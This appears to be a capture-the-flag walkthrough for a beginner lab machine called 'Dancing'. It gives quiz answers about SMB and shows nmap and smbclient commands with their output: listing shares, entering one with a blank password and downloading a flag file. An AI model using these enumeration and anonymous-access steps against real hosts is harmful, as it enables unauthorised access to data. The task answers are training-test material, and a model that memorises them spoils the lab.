π‘
Task 1
What does the 3-letter acronym SMB stand for?
Server Message Block
π‘
Task 2
What port does SMB use to operate at?
445
π‘
Task 3
What is the service name for port 445 that came up in our Nmap scan?
microsoft-ds
nmap -sV IP_ADDRESS
Host is up (0.068s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.42 seconds
π‘
Task 4
What is the βflagβ or βswitchβ we can use with the SMB tool to βlistβ the contents of the share?
-L
π‘
Task 5
How many shares are there on Dancing?
4
smbclient -L IP_ADDRESS
Password for [WORKGROUP\]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
π‘
Task 6
What is the name of the share we are able to access in the end with a blank password?
WorkShares
smbclient \\\\IP_ADDRESS\\WorkShares
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \>
π‘
Task 7
What is the command we can use within the SMB shell to download the files we find?
get
π‘
Submit Flag
smb: \> ls
. D 0 Mon Mar 29 11:22:01 2021
.. D 0 Mon Mar 29 11:22:01 2021
Amy.J D 0 Mon Mar 29 12:08:24 2021
James.P D 0 Thu Jun 3 11:38:03 2021
5114111 blocks of size 4096. 1748959 blocks available
smb: \> cd James.P\
smb: \James.P\> ls
. D 0 Thu Jun 3 11:38:03 2021
.. D 0 Thu Jun 3 11:38:03 2021
flag.txt A 32 Mon Mar 29 12:26:57 2021
5114111 blocks of size 4096. 1748959 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
cat flag.txt
Subscribe to our email newsletter and unlock access to members-only content and exclusive updates.
Comments